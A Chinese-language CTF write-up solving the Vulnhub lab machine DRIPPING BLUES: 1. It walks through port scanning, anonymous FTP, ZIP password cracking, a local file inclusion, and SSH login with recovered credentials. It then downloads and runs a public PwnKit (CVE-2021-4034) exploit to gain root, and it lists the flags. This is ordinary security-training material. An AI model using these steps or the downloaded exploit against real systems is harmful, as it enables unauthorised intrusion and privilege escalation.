【Vulnhub 靶场】DRIPPING BLUES: 1
字数 1674
更新时间 2025-08-12 18:43:32
DRIPPING BLUES: 1 靶机渗透测试教学文档
环境准备
靶机信息
- 靶机名称:DRIPPING BLUES: 1
- 操作系统:Ubuntu 20.04.1
- 内核版本:Linux 5.11.0-34
- 下载地址:https://www.vulnhub.com/entry/dripping-blues-1,744/
网络配置
- 攻击机:Kali Linux (IP: 192.168.75.143)
- 靶机:DHCP自动获取IP (最终确定为192.168.75.142)
- 网络模式:NAT模式
信息收集阶段
1. 网络扫描
使用arp-scan发现靶机IP:
arp-scan -l
2. 端口扫描
全面扫描靶机开放端口:
nmap -p- -sV 192.168.75.142
扫描结果:
- 21/tcp: vsftpd 3.0.3 (FTP服务)
- 22/tcp: OpenSSH 8.2p1 (SSH服务)
- 80/tcp: Apache httpd 2.4.41 (HTTP服务)
详细扫描:
nmap -A -p 1-65535 192.168.75.142
服务枚举与漏洞利用
1. FTP服务 (21端口)
匿名登录FTP
ftp 192.168.75.142
用户名:ftp 或 anonymous
密码:任意
获取文件
ls -la # 查看文件
get respectmydrip.zip # 下载文件
ZIP密码爆破
使用fcrackzip工具:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
爆破结果:密码为072528035
解压后得到:
- respectmydrip.txt (提示关键词"drip")
- secret.zip (需要进一步解压)
2. Web服务 (80端口)
网站分析
- 首页被入侵者(travisscott和thugger)篡改
- robots.txt内容:
/dripisreal.txt /etc/dripispowerful.html
dripisreal.txt分析
- 提示通过特定歌词页面计算MD5作为SSH密码
- 歌词链接:https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
- 示例:
hellohellohellohello >> md5sum hellohellohellohello
本地文件包含漏洞
尝试访问/etc/dripispowerful.html:
curl http://192.168.75.142/?drip=/etc/dripispowerful.html
发现被篡改内容,包含密码提示:imdrippinbiatch
3. SSH服务 (22端口)
使用获取的凭据登录:
ssh thugger@192.168.75.142
密码:imdrippinbiatch
登录后查找flag:
find / -name *.txt 2>/dev/null
发现:
- /home/thugger/user.txt (内容:5C50FC503A2ABE93B4C5EE3425496521)
- MD5解密为:toomanydrip
- /root/root.txt (内容:78CE377EF7F10FF0EDCA63DD60EE63B8)
权限提升
系统信息收集
- 内核版本:5.11.0-34
- Sudo版本:1.8.31
- 无gcc和make环境
- Python版本:3.8.2
可用漏洞
- Linux DirtyPipe (CVE-2022-0847)
- Linux kernel权限提升 (CVE-2021-3493)
- Linux sudo权限提升 (CVE-2021-3156)
- Linux Polkit权限提升 (CVE-2021-4034)
选择Polkit提权
由于缺少编译环境,选择Polkit漏洞:
- 下载利用代码:
wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip
unzip master.zip
cd CVE-2021-4034-master/
- 执行提权:
python3 cve2021-4034.py
- 验证提权:
whoami # 显示root
总结
渗透路径
- FTP匿名登录 → 获取ZIP文件 → 爆破解压 → 获取提示
- Web目录扫描 → 发现LFI漏洞 → 获取SSH密码
- SSH登录 → 查找flag → 发现提权线索
- 利用Polkit漏洞 → 获取root权限 → 读取root flag
关键点
- FTP匿名访问是常见入口点
- ZIP密码爆破使用rockyou字典
- Web目录扫描和robots.txt分析很重要
- LFI漏洞参数名需要尝试(drip)
- 系统环境限制决定提权方式选择
- Polkit漏洞利用不需要编译环境
获取的凭证
- FTP: 匿名访问
- SSH: thugger/imdrippinbiatch
- User flag: 5C50FC503A2ABE93B4C5EE3425496521 (toomanydrip)
- Root flag: 78CE377EF7F10FF0EDCA63DD60EE63B8
相似文章
相似文章